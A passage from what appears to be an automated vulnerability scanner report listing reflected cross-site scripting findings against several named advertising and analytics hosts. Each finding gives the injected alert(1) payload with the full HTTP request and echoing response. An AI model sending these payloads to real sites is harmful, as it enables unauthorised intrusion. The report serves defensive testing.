Date: Tue, 04 Oct 2011 20:31:20 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=sea-dc-dc%5D%5D%3E%3E%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Thu, 03-Nov-2011 20:31:20 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/iblocal.3interactive.ron/n7061_728ros40e0a'-alert(1)-'c3c00823c89;kw=n7061_728ros;sz=728x90;net=iblocal;ord=0.7794340003747493;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.12. http://a.collective-media.net/adj/iblocal.3interactive.ron/n7061_728ros [kw parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/iblocal.3interactive.ron/n7061_728ros

Issue detail

The value of the kw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5933'-alert(1)-'29310fe19c2 was submitted in the kw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/iblocal.3interactive.ron/n7061_728ros;kw=n7061_728ros;sz=728x90;ord=0.7794340003747493?a5933'-alert(1)-'29310fe19c2 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=8005/1752/1;s=638;d=14;w=728;h=90
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 500
Date: Tue, 04 Oct 2011 20:31:17 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=sea-dc-dc%5D%5D%3E%3Ef21df86b6735b16d3c8e0c77; domain=collective-media.net; path=/; expires=Thu, 03-Nov-2011 20:31:17 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/iblocal.3interactive.ron/n7061_728ros;kw=n7061_728ros;sz=728x90;net=iblocal;ord=0.7794340003747493?a5933'-alert(1)-'29310fe19c2;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.13. http://a.collective-media.net/adj/iblocal.3interactive.ron/n7061_728ros [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/iblocal.3interactive.ron/n7061_728ros

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2802'-alert(1)-'301e4287ccb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/iblocal.3interactive.ron/n7061_728ros;kw=n7061_728ros;sz=728x90;ord=0.7794340003747493?&d2802'-alert(1)-'301e4287ccb=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=8005/1752/1;s=638;d=14;w=728;h=90
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 503
Vary: Accept-Encoding
Date: Tue, 04 Oct 2011 20:31:18 GMT
Connection: close
Set-Cookie: dc=sea-dc-dc%5D%5D%3E%3E%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Thu, 03-Nov-2011 20:31:18 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/iblocal.3interactive.ron/n7061_728ros;kw=n7061_728ros;sz=728x90;net=iblocal;ord=0.7794340003747493?&d2802'-alert(1)-'301e4287ccb=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.14. http://a.collective-media.net/cmadj/iblocal.3interactive.ron/n7061_728ros [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.3interactive.ron/n7061_728ros

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce765'-alert(1)-'db9b9346edb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadjce765'-alert(1)-'db9b9346edb/iblocal.3interactive.ron/n7061_728ros;kw=n7061_728ros;sz=728x90;net=iblocal;ord=0.7794340003747493;env=ifr;ord1=431781;cmpgurl=http%253A//www.news.com.au/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=8005/1752/1;s=638;d=14;w=728;h=90
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 04 Oct 2011 20:31:20 GMT
Content-Length: 7418
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='122f463e720f79d';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-30509189363_1317760280","http://ad.doubleclick.net/adjce765'-alert(1)-'db9b9346edb/iblocal.3interactive.ron/n7061_728ros;net=iblocal;u=,iblocal-30509189363_1317760280,122f463e720f79d,polit,;;kw=n7061_728ros;sz=728x90;net=iblocal;env=ifr;ord1=431781;cmw=nowl;contx=polit;dc=s;btg=;ord
...[SNIP]...

1.15. http://a.collective-media.net/cmadj/iblocal.3interactive.ron/n7061_728ros [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.3interactive.ron/n7061_728ros

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f5a58'-alert(1)-'906117d89cf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/iblocal.3interactive.ronf5a58'-alert(1)-'906117d89cf/n7061_728ros;kw=n7061_728ros;sz=728x90;net=iblocal;ord=0.7794340003747493;env=ifr;ord1=431781;cmpgurl=http%253A//www.news.com.au/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=8005/1752/1;s=638;d=14;w=728;h=90
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7418
Date: Tue, 04 Oct 2011 20:31:20 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='122f463e720f79d';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-30123908496_1317760280","http://ad.doubleclick.net/adj/iblocal.3interactive.ronf5a58'-alert(1)-'906117d89cf/n7061_728ros;net=iblocal;u=,iblocal-30123908496_1317760280,122f463e720f79d,polit,;;kw=n7061_728ros;sz=728x90;net=iblocal;env=ifr;ord1=431781;cmw=nowl;contx=polit;dc=s;btg=;ord=0.7794340003747493?","72
...[SNIP]...

1.16. http://a.collective-media.net/cmadj/iblocal.3interactive.ron/n7061_728ros [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.3interactive.ron/n7061_728ros

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c1bc'-alert(1)-'28be1efec48 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/iblocal.3interactive.ron/n7061_728ros8c1bc'-alert(1)-'28be1efec48;kw=n7061_728ros;sz=728x90;net=iblocal;ord=0.7794340003747493;env=ifr;ord1=431781;cmpgurl=http%253A//www.news.com.au/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=8005/1752/1;s=638;d=14;w=728;h=90
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7418
Date: Tue, 04 Oct 2011 20:31:21 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='122f463e720f79d';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-30107475256_1317760281","http://ad.doubleclick.net/adj/iblocal.3interactive.ron/n7061_728ros8c1bc'-alert(1)-'28be1efec48;net=iblocal;u=,iblocal-30107475256_1317760281,122f463e720f79d,polit,;;kw=n7061_728ros;sz=728x90;net=iblocal;env=ifr;ord1=431781;cmw=nowl;contx=polit;dc=s;btg=;ord=0.7794340003747493?","728","90",true)
...[SNIP]...

1.17. http://a.collective-media.net/cmadj/iblocal.3interactive.ron/n7061_728ros [kw parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.3interactive.ron/n7061_728ros

Issue detail

The value of the kw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ca2a'-alert(1)-'14d508e3d65 was submitted in the kw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/iblocal.3interactive.ron/n7061_728ros;kw=4ca2a'-alert(1)-'14d508e3d65 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=8005/1752/1;s=638;d=14;w=728;h=90
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 04 Oct 2011 20:31:17 GMT
Content-Length: 7336
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='122f463e720f79d';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
iveMedia.createAndAttachAd("iblocal-30206994978_1317760277","http://ad.doubleclick.net/adj/iblocal.3interactive.ron/n7061_728ros;net=iblocal;u=,iblocal-30206994978_1317760277,122f463e720f79d,none,;;kw=4ca2a'-alert(1)-'14d508e3d65;cmw=nurl;contx=none;dc=s;btg=?","0","0",true);</scr'+'ipt>
...[SNIP]...

1.18. http://ad.technoratimedia.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.technoratimedia.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72afb"-alert(1)-"c9cbad768b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?pfm=1&tent=ch&tnws=ch&rtg=ga&brw=cr3&os=wn7&prm=0&efo=0&atf=0&uatRandNo=74877&ad_type=ad&section=1782249&ad_size=728x90&72afb"-alert(1)-"c9cbad768b4=1 HTTP/1.1
Host: ad.technoratimedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.carsguide.com.au/search/?N=4294962119&origin=browse&Nf=pYear|GTEQ%202008&type=cars
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 20:31:15 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Tue, 04 Oct 2011 20:31:15 GMT
Pragma: no-cache
Age: 0
Proxy-Connection: keep-alive
Content-Length: 4405

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.technoratimedia.com/imp?72afb"-alert(1)-"c9cbad768b4=1&Z=728x90&atf=0&brw=cr3&efo=0&os=wn7&pfm=1&prm=0&rtg=ga&s=1782249&tent=ch&tnws=ch&uatRandNo=74877&_salt=2562200122";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!windo
...[SNIP]...

1.19. http://adsfac.eu/ag.asp [cc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adsfac.eu
Path:   /ag.asp

Issue detail

The value of the cc request parameter is copied into the HTML document as plain text between tags. The payload a7f40<script>alert(1)</script>432b200b5ff was submitted in the cc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ag.asp?cc=a7f40<script>alert(1)</script>432b200b5ff&source=js&ord=[timestamp] HTTP/1.1
Host: adsfac.eu
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.milkround.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UserID=610040839265718; FSCIT00728473=uid=104893036; FSCIT007=pctl=28473&pctm=1&fpt=0%2C28473%2C&pct%5Fdate=4294&FL28473=1&FM149947=1&pctc=149947&FQ=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 293
Content-Type: text/html
Expires: Tue, 04 Oct 2011 20:09:27 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FSa7f40%3Cscript%3Ealert%281%29%3C%2Fscript%3E432b200b5ff0=uid=107239383; expires=Wed, 05-Oct-2011 20:10:26 GMT; domain=.adsfac.eu; path=/
Set-Cookie: FSa7f40%3Cscript%3Ealert%281%29%3C%2Fscript%3E432b200b5ff=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4294&pctm=1&FM1=1&pctc=1&FL0=1&FQ=1; expires=Fri, 04-Nov-2011 21:10:26 GMT; domain=.adsfac.eu; path=/
Set-Cookie: UserID=610040839265718aa8cb77f64554de065e9d97d; expires=Fri, 04-Nov-2011 21:10:26 GMT; domain=.adsfac.eu; path=/
P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT"
Date: Tue, 04 Oct 2011 20:10:27 GMT

if (typeof(fd_clk) == 'undefined') {var fd_clk = 'http://adsfac.eu/link.asp?cc=a7f40<script>alert(1)</script>432b200b5ff.0.0&CreativeID=1';}document.write('<a href="'+fd_clk+'&CreativeID=1" target="_blank">
...[SNIP]...

1.20. http://adsfac.net/ag.asp [cc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adsfac.net
Path:   /ag.asp

Issue detail

The value of the cc request parameter is copied into the HTML document as plain text between tags. The payload 1b425<script>alert(1)</script>926cd7da7c3 was submitted in the cc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ag.asp?cc=1b425<script>alert(1)</script>926cd7da7c3&source=js&ord=920717113 HTTP/1.1
Host: adsfac.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://view.atdmt.com/2D1/iview/289812590/direct;wi.300;hi.250/01/4264749?click=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3b96/3/0/%2a/l%3B246942787%3B0-0%3B0%3B30941364%3B4307-300/250%3B41115319/41133106/1%3B%3B%7Eokv%3D%3Bsec1%3Dhome%3Barea%3Dhome%3Btile%3D4%3Bpos%3D1%3Bsz%3D300x250%2C300x600%3Bkw%3Dfox+sports%2Cfox+sports+videos%2Cfox+sports+news%2Cfoxsports+au%2Cfox+news+sports%2Cfox+sports+online%2Cfox+sports+au%2Cwatch+fox+sports+online%2Cafl%2Cnrl%2Crugby+league%2Cstate+of+origin%2Crugby%2Crugby+union%2Cwallabies%2Cfootball%2Csoccer%2Ca-league%2Cepl%2Csocceroos%2Ccricket%2Cmotor+sport%2Ctennis%2Cgolf+%3B%7Esscs%3D%3f
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSHOM032=fpt=0%2C150687%2C&pct%5Fdate=4273&pctl=150687&FL150687=1&pctm=1&FM216892=1&pctc=216892&FQ=1; FSUBA007=fpt=0%2C69739%2C&gid=7660725445&STT=compare%2520savings%2520accounts%2520rates&pctm=1&pctcrt=1&pctl=69739&FL69739=1&xid=SnZCogZMH%5F7660725445&FM143325=1&pctc=143325&pdc=4290&FQ=1; FSDDA024=fpt=0%2C69739%2C&gid=8339786469&STT=bank%2520account%2520high%2520interest&pctm=1&pctcrt=1&FL69739=1&pctl=69739&FM153167=1&pctc=153167&pdc=4290&FQ=1; FSATR071=pctm=2&FL154149=2&pctc=221544&FQ=2&pctl=154149&FM221544=2&fpt=0%2C154149%2C&pct%5Fdate=4295; FSATR071154149=uid=7011717; FSGEP009145951=uid=7339671; FSGEP009=pctl=145951&fpt=0%2C145951%2C&pct%5Fdate=4295&pctm=1&FL145951=1&FM222647=1&pctc=222647&FQ=1; UserID=991308392614943

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 04 Oct 2011 20:31:06 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT"
Pragma: no-cache
Content-Length: 301
Content-Type: text/html
Expires: Tue, 04 Oct 2011 20:30:06 GMT
Set-Cookie: FS1b425%3Cscript%3Ealert%281%29%3C%2Fscript%3E926cd7da7c30=uid=9588089; expires=Wed, 05-Oct-2011 20:31:06 GMT; domain=.adsfac.net; path=/
Set-Cookie: FS1b425%3Cscript%3Ealert%281%29%3C%2Fscript%3E926cd7da7c3=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4295&pctm=1&FM665=1&pctc=665&FL0=1&FQ=1; expires=Fri, 04-Nov-2011 20:31:06 GMT; domain=.adsfac.net; path=/
Set-Cookie: UserID=99130839261494330b3e791efde65d3500815c7; expires=Fri, 04-Nov-2011 20:31:06 GMT; domain=.adsfac.net; path=/
Cache-control: private

if (typeof(fd_clk) == 'undefined') {var fd_clk = 'http://adsfac.net/link.asp?cc=1b425<script>alert(1)</script>926cd7da7c3.0.0&CreativeID=665';}document.write('<a href="'+fd_clk+'&CreativeID=665" target="_blank">
...[SNIP]...

1.21. http://api.echoenabled.com/api/v1/search [q parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.echoenabled.com
Path:   /api/v1/search

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 8ed8c<a>f98f7f6b4df was submitted in the q parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /api/v1/search?q=childrenof%3Ahttp%3A%2F%2Fwww.thedailybeast.com%2Farticles%2F2011%2F10%2F04%2Fthe-simpsons-money-dispute-may-shut-down-fox-tv-s-long-running-hit.html+-source%3ATwitter+-state%3AModeratorDeleted%2CModeratorFlagged%2CSystemFlagged+-user.state%3AModeratorBanned+children%3A1+-source%3ATwitter+-state%3AModeratorDeleted%2CModeratorFlagged%2CSystemFlagged+-user.state%3AModeratorBanned+8ed8c<a>f98f7f6b4df&appkey=prod.newsweek.com&callback=jQuery16200750702265650034_1317758935251 HTTP/1.1
Host: api.echoenabled.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.thedailybeast.com/articles/2011/10/04/the-simpsons-money-dispute-may-shut-down-fox-tv-s-long-running-hit.html?cid=askmentrade
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Server: Yaws/1.85 Yet Another Web Server
Date: Tue, 04 Oct 2011 20:30:44 GMT
Content-Length: 161
Content-Type: application/x-javascript; charset="utf-8"

jQuery16200750702265650034_1317758935251({ "result": "error", "errorCode": "wrong_query", "errorMessage": "Parse error near: \"8ed8c<a>f98f7f6b4df\" at 361" });

1.22. http://api.echoenabled.com/v1/search [q parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.echoenabled.com
Path:   /v1/search

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 8c9fc<a>67f44da5a47 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /v1/search?callback=jQuery16200750702265650034_1317758935242&q=childrenof%3Ahttp%3A%2F%2Fwww.thedailybeast.com%2Farticles%2F2011%2F10%2F04%2Fthe-simpsons-money-dispute-may-shut-down-fox-tv-s-long-running-hit.html+-source%3ATwitter+-state%3AModeratorDeleted%2CModeratorFlagged%2CSystemFlagged+-user.state%3AModeratorBanned+children%3A1+-source%3ATwitter+-state%3AModeratorDeleted%2CModeratorFlagged%2CSystemFlagged+-user.state%3AModeratorBanned+8c9fc<a>67f44da5a47&appkey=prod.newsweek.com&_=1317758951074 HTTP/1.1
Host: api.echoenabled.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.thedailybeast.com/articles/2011/10/04/the-simpsons-money-dispute-may-shut-down-fox-tv-s-long-running-hit.html?cid=askmentrade
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Server: Yaws/1.85 Yet Another Web Server
Date: Tue, 04 Oct 2011 20:17:56 GMT
Content-Length: 161
Content-Type: application/x-javascript; charset="utf-8"

jQuery16200750702265650034_1317758935242({ "result": "error", "errorCode": "wrong_query", "errorMessage": "Parse error near: \"8c9fc<a>67f44da5a47\" at 361" });

1.23. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 49210<script>alert(1)</script>90075246625 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=349210<script>alert(1)</script>90075246625&c2=7117341&c3=5797640&c4=44103179&c5=70503637&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://m.adnxs.com/tt?member=280&inv_code=SPTSHP&cb=1629178796
Accept-Encoding: gzip,deflate,sdch
